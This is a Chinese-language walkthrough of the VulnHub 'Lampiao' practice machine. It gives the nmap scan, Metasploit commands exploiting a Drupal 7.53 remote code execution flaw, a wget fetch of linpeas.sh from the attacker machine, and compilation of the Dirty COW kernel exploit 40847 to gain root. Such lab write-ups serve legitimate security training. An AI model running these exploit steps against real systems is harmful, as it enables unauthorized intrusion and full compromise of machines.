环境搭建
https://www.vulnhub.com/entry/lampiao-1,249/
靶机: lampiao 192.168.101.59
攻击机: kali 192.168.101.31
信息收集
nmap -sV -sC -v -p- --min-rate 1000 192.168.101.59
参数解释:
-sV: 进行服务版本的检测,确认目标主机上运行的每个开放端口的服务版本
-sC:启用默认的脚本扫描,nmap内置了一些脚本,用于执行各种常见的网络扫描任务,例如发现漏洞等
-v: 启用详细模式,启用这个选项,nmap将输出更多的信息,包扩扫描过程的详细进展和结果
-p-:扫描目标主机上的所有端口,包括1到65535
--min-rate 1000:设置了扫描的最小速率为1000个包/秒。这个选项可以帮助在扫描期间控制发送到目标主机的数据包的速率,以减轻网络负载和减少触发入侵检测系统(IDS)的风险
可以发现开放了ssh服务以及80和1898两个web服务,可以尝试对ssh进行爆破,但无果
渗透测试
进入80端口的网站,从源码和目录都没有发现什么东西
访问1898的网站,发现是一个Drupal搭建的网站,继续进行目录扫描
发现扫出了很多东西,就先去robots.txt看看吧
我们在一个叫CHANGELOG.txt的文件中发现了该CMS的具体版本,为Drupal 7.53,去google上看看该版本有没有什么漏洞,发现该cms在7.x版本存在远程命令执行漏洞
在metasploit的库中进行搜索,发现有roby文件,可以直接在metasploit中使用,那就启动!
msfconsole
search drupal
发现有几个exp,可以尝试下excellent级别的
经过尝试之后,编号为1的exp可以利用
use 1
show options
set rhosts 192.168.101.59
set rport 1898
run
拿到普通权限的shell
升级shell
权限提升
上传一个linux信息收集工具linpeas.sh,先在kali开启网站服务
在靶机中下载该工具并赋予执行权限
cd /tmp
wget http://192.168.101.31/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
发现其内核为2016的Linux,就很可能存在脏牛漏洞
准备40847的exp
searchsploit dirty -m 40847
在靶机上下载下来编译,但普通编译出错,搜一下怎么编译的
g++ -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
chmod +x 40847
./40847
-O2:这是一个编译选项,表示启用优化级别2。优化级别2是一种中等级别的优化,它将尝试通过优化代码以提高执行速度和减少生成的代码大小
-std=c++11:这个选项指定了C++的语言标准。在这里,它指定了使用C++11标准进行编译
-pthread:这个选项告诉编译器链接pthread库,以支持多线程编程
-lutil:这个选项告诉编译器链接libutil库
得到root的密码:dirtyCowFun,登录上去,得到root权限
在/root下找到flag